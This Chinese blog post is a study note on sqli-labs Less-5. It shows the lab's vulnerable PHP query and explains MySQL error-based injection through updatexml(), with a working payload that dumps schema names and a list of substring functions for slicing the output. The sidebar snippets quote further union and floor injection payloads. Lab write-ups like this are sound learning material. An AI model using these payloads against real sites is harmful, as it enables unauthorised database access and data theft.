sqli第五关报错注入

已于 2024-03-29 17:49:02 修改
阅读量455 收藏
点赞数 3
文章标签: 网络
于 2024-03-29 13:46:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gchoud/article/details/137137801
版权
文章介绍了SQL查询中的MySQL查询和XML更新函数updatexml的使用,包括XPath表达式的应用,同时提到了XPath中特殊字符处理和SQL注入的潜在风险。
摘要由CSDN通过智能技术生成

源码(单引号闭合但是没有回显)

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

updatexml注入

UPDATEXML(xml_data, '//order[@id="123"]/customer', 'Jane Roe')
updatexml(1,concat(0x7e,(),0x7e),1)

UPDATEXML() 函数用于在 XML 文档中更新特定节点的值。它接受三个参数:

  1. 要更新的 XML 文档:这通常是一个包含 XML 数据的列或变量。在上述示例中,xml_data 列存储了 XML 文档。

  2. XPath 表达式:这是用于定位要更新的节点的路径表达式。XPath 是一种用于在 XML 文档中导航和选择节点的语言。在示例中,'//employee[@id="1"]/department' 是一个 XPath 表达式,它选择了所有具有 id 属性值为 1 的 employee 节点的 department 子节点。

  3. 新的值:这是要设置给选定节点的新值。在示例中,'Operations' 是要设置的新部门名称。

 xpath出现特殊字符会报错;

如果是~则报如下错:XPATH syntax error: '~'

注:0x7e就是~

该报错最多回显32个字符(所有要截取)

payload

?id=1' and updatexml(1,right(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),32),3)--+

1、left(201809,4)截取左边的4个字符
SELECT LEFT(201809,4)    //结果:2018

2、right(name,2)截取右边的2个字符
SELECT RIGHT(201809,2)    //结果:09

3、SUBSTRING(name,5,3) 截取name这个字段 从第五个字符开始 只截取之后的3个字符
SELECT SUBSTRING('成都融资事业部',5,3)   //结果:事业部

4、SUBSTRING(name,3) 截取name这个字段 从第三个字符开始,之后的所有个字符
SELECT SUBSTRING('成都融资事业部',3)   //结果:融资事业部

5、SUBSTRING(name, -4) 截取name这个字段的第 4 个字符位置(倒数)开始取,直到结束
SELECT SUBSTRING('成都融资事业部',-4)   //结果:资事业部

6、SUBSTRING(name, -4,2) 截取name这个字段的第 4 个字符位置(倒数)开始取,只截取之后的2个字符
SELECT SUBSTRING('成都融资事业部',-4,2)   //结果:资事
注意:我们注意到在函数 substring(str,pos, len)中, pos 可以是负值,但 len 不能取负值。

7、substring_index('www.baidu.com', '.', 2) 截取第二个 '.' 之前的所有字符
SELECT substring_index('www.baidu.com', '.', 2)   //结果:www.baidu

8、substring_index('www.baidu.com', '.', -2) 截取第二个 '.' (倒数)之后的所有字符
SELECT substring_index('www.baidu.com', '.', -2)   //结果:baidu.com

9、SUBSTR(name, 1, CHAR_LENGTH(name)-3) 截取name字段,取除name字段后三位的所有字符
SELECT SUBSTR('成都融资事业部', 1, CHAR_LENGTH('成都融资事业部')-3)            //结果:成都融资

10、mid(str,start,[length])
str:截取的字符串   start:起始位置   length:截取的长度,可以忽略

 

gchoud
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5669
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
第六节 GET报错注入-01
09-15
第六节的讨论聚焦于一种常见的安全漏洞,称为“GET报错注入”。报错注入是Web应用程序中的一个严重问题,它允许攻击者通过诱使系统产生错误消息来揭示敏感信息。这种攻击方式通常利用了应用程序对错误处理不当,使得...
sql-labs SQL注入平台-第5Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
Onlyone_1314的博客
09-03 418
Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
sqli_libs第五
qq_42103643的博客
07-24 184
第五 第一种:非常复杂,我也没太搞明白 order by 3正常,order by 4异常 ’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a–+ 查数据库名 union SELECT null,count(*),concat((select table_name from information_schema.table
sqli-labs第五(配合布尔盲注以及python脚本))
加油~
05-11 1175
进入第五,正常显示如下:![image.png](https://img-blog.csdnimg.cn/img_convert/fb62cfcc13c424b26cdbc08d0250f9eb.png#clientId=udf7edcfc-d50d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=864&id=u753066f5&margin=[object Object]&name=
布尔盲注--sqli-labs靶场第五
最新发布
qq_75120258的博客
04-04 1069
布尔盲注是一种 SQL 注入攻击技术,攻击者利用真假值来推断数据库中的信息。它不需要注入恶意 SQL 代码,而是通过观察服务器响应的差异来获取信息。
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
mysql注入-sqlilabs靶场注入
10-15
5. 使用安全的开发实践:比如遵循OWASP SQL注入防护指南,进行代码审查,以及定期更新数据库系统和驱动程序。 在SQLiLabs靶场中,每一都会提供一个带有漏洞的Web应用,你需要通过注入来获取目标数据。通过实际...
sqlilabs过手册注入天书.pdf
09-14
sqlilabs过手册注入天书.pdf
sqli-labs通(五)
qq_65950075的博客
04-30 826
但是这一没有回显信息,输入正确就会出现以下信息,错误则会报错,说明存在布尔盲注,我们可以利用这个来进行判断。函数 substr(a,b,c),a是截取的字符串 ,b是截取的位置 ,c是截取的长度。length()函数是返回字符串的长度,先暂且猜测数据库名长度是1。开始攻击,8的返回长度不一样,所以猜测数据库名的长度就是8。然后就是逐个爆破后面字母,直到把8个字母的库名爆出来,但是。然后我们验证,显示正常,说明数据库名长度就是8。设置类型为数值,从1到20,步长为1。id=1,只有下面这种结果。
SQLI-labs-第五和第六
weixin_54055099的博客
09-05 434
SQLI第五布尔盲注的思路和步骤
sqli-labs第五
m0_73248913的博客
02-04 201
以上是纯手工的方式来解决问题,没有任何脚本软件。
Sqli-labs第5~8详解
qq_45927819的博客
09-29 1044
文章目录第五报错注入floor报错语句注入:extractvalue函数进行报错注入第六第七 第五 当输入?id=1时显示下面的页面 当输入?id=1'时显示异常 页面没有显示位。无法使用联合查询注入。 显示位的解释:在一个网站正常的界面,服务端执行Sql语句查询数据库中的数据,客户端会将数据显示在页面中,这个显示数据的位置就叫做显示位。 如: 报错注入 什么是报错注入呢? 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。0x7e=’~’ 首先介绍三种报
sqli-lab5和10详解
cangyu51462的博客
04-16 2321
sqli-lab5和10详解
sqli 第五(不用sqlmap)
laykr的博客
10-25 123
id=-1' and updatexml(1,concat("~",(SELECT database()),0x7e),1) --+ (0x7e就是~)id=-1' union select 1,2,3 --+)这里union前面id必须为不存在的。至此,sqli第五结束,第6就是把id那里的'换成了",没有什么区别,这里就不说了。看着很长,其实思路也一样,现在找到security库里有users表,开始爆字段。没有回显列,说明不能像前四道一样,但观察到有报错回显,应该可以用报错注入试试。
利用extractvalue报错注入sqli-labs第五
m0_64080230的博客
06-21 258
sqli-labs第五 火狐浏览器 hackbar。
sqli靶场5-6题学习思路
weixin_42321633的博客
04-24 74
找到闭合,然后安装信息提示一点点尝试,除了updatexml其他的尝试方式依旧能得到想要的结果,今天有些懒了本来打算做到15题接过刷了一晚上手机其实也就刷了1题,56的思路是一样的只是闭合不一样。//得到XPATH syntax error: '~emails~',修改limit 0,1 依次遍历得到emails uagents users。//得到XPATH syntax error: '~security~'和第五差不多只是闭合 " 多尝试几次就发现了。
sqlilabs第五布尔盲注(burpsuite版)
Innocence_0的博客
03-06 497
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
sqlilabs靶场搭建报错
10-07
靶场搭建报错可能有多种原因,根据提供的引用内容,主要有两个可能的原因。第一个原因是sqli-labs文件夹没有正确解压到phpstudy_pro\WWW目录下,并且没有更名为sqli。请确保sqli-labs-master.zip已经解压到了正确的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值